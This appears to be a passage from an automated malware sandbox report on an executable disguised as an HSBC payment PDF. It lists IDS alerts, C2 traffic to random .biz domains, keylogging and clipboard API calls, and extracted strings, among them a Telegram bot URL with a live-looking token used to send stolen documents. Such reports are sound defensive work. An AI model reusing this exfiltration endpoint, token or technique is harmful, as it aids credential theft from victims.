              Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49702
              Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49702
              Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49709
              Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49709
              Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 193.122.6.168:80
              Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49972
              Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49972
              Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49966
              Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49966
              Source: global traffic | HTTP traffic detected:
                  POST /mgppdv HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: pywolwnvd.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 898
              Source: global traffic | HTTP traffic detected:
                  POST /leanpmxsxneexgiv HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: pywolwnvd.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  GET / HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                  Host: checkip.dyndns.org
                  Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected:
                  POST /udp HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: ssbzmoy.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  GET / HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                  Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected:
                  POST /hfsfqfqbrwib HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: cvgrf.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /bd HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: npukfztj.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /opymuwnb HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: przvgke.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  GET /opymuwnb HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Host: ww99.przvgke.biz
              Source: global traffic | HTTP traffic detected:
                  GET /opymuwnb?usid=26&utid=9416579686 HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Host: ww12.przvgke.biz
              Source: global traffic | HTTP traffic detected:
                  POST /meqybx HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: przvgke.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /tydyiliq HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: knjghuig.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /hncx HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: lpuegx.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /fprrydnqfsccl HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: lpuegx.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /kp HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: vjaxhpbji.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /hptny HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: vjaxhpbji.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /sqemlirtfccimfo HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: xlfhhhm.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /vcyisuboorqd HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: ifsaia.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /peioi HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: saytjshyf.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /ymdlhl HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: vcddkls.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  POST /mepglnjkcg HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: fwiwk.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 850
              Source: global traffic | HTTP traffic detected:
                  GET /mepglnjkcg HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Host: ww99.fwiwk.biz
              Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49715 version: TLS 1.0
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_004722EE
              Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
              Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
              Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
              Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
              Source: global traffic | DNS traffic detected: DNS query: npukfztj.biz
              Source: global traffic | DNS traffic detected: DNS query: przvgke.biz
              Source: global traffic | DNS traffic detected: DNS query: ww99.przvgke.biz
              Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
              Source: global traffic | DNS traffic detected: DNS query: ww12.przvgke.biz
              Source: global traffic | DNS traffic detected: DNS query: zlenh.biz
              Source: global traffic | DNS traffic detected: DNS query: knjghuig.biz
              Source: global traffic | DNS traffic detected: DNS query: uhxqin.biz
              Source: global traffic | DNS traffic detected: DNS query: anpmnmxo.biz
              Source: global traffic | DNS traffic detected: DNS query: lpuegx.biz
              Source: global traffic | DNS traffic detected: DNS query: vjaxhpbji.biz
              Source: global traffic | DNS traffic detected: DNS query: xlfhhhm.biz
              Source: global traffic | DNS traffic detected: DNS query: ifsaia.biz
              Source: global traffic | DNS traffic detected: DNS query: saytjshyf.biz
              Source: global traffic | DNS traffic detected: DNS query: vcddkls.biz
              Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
              Source: global traffic | DNS traffic detected: DNS query: ww99.fwiwk.biz
              Source: global traffic | DNS traffic detected: DNS query: ww12.fwiwk.biz
              Source: armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/
              Source: armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/3VX&
              Source: armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
              Source: armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/3VX&
              Source: armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/8Va&
              Source: armsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/tydyiliq
              Source: armsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/tydyiliq1
              Source: armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/
              Source: armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/bd
              Source: armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
              Source: armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/3VX&
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/I$o
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/NU$
              Source: armsvc.exe, 00000004.00000003.1354308285.000000000085F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/leanpmxsxneexgiv
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346799710.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/mgppdv
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177:80/mgppdv
              Source: armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/
              Source: armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/OV
              Source: armsvc.exe, 00000004.00000003.1992416564.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/fprrydnqfsccl
              Source: armsvc.exe, 00000004.00000003.1992970471.0000000000873000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/hncx
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.0000000002741000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
              Source: armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://knjghuig.biz/
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.0000000002741000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRm
              Source: armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686
              Source: armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/K
              Source: armsvc.exe, 00000004.00000003.1501939823.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/opymuwnb
              Source: armsvc.exe, 00000004.00000003.1693479400.0000000001F90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.winimage.com/zLibDll
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachine
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
              Source: RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
              Source: armsvc.exe, 00000004.00000003.1745306096.0000000001F90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
              Source: armsvc.exe, 00000004.00000003.1746193231.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1746599342.0000000001F90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://comments.adobe.io
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://comments.adobe.io/schemas/annots_metadata.jsonld
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://comments.adobe.io/schemas/bulk_entity_v1.json
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://comments.adobe.io/schemas/entity_v1.json
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://comments.adobe.io/schemas/user_comment_metadata_result_v1.json
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://dc-api.adobe.io/discovery
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://dc-api.adobe.io/discoverySoftware
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://dc-api.adobe.io/schemas/discovery_v1.json
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://dc-api.adobe.io/schemas/folder_listing_v1.json
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1488451296.0000000002050000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://notify-stage.adobe.io/ans
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://notify-stage.adobe.io/ans/
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://notify-stage.adobe.io/anshttps://notify.adobe.io/ansEnableDesktopNotificationlocale
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://notify.adobe.io/ans
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://notify.adobe.io/ans/
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content?https://p13n.adobe.io/psdk/v2/content?%Y-%m-%dT%H:%M:%SZ
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://p13n.adobe.io/psdk/v2/content?
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1488451296.0000000002050000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
              Source: armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pcnatrk.net/track.
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://reviews.adobe.io
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://reviews.adobe.iourifullpayloadlinksinvitationURIreviewURIcommentingAssetURNEurekaInvitationI
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.com
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.com.adobe.ioassetUrnreviewUrnFilesFile
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.com0
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comK
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comReadStatus
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdate
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comemptyAnnotations
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.cominvalidAnnotIdList
              Source: AdobeCollabSync.exe.4.dr | String found in binary or memory: https://scss.adobesc.comreasoncom.adobe.review.sdk
              Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49736 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
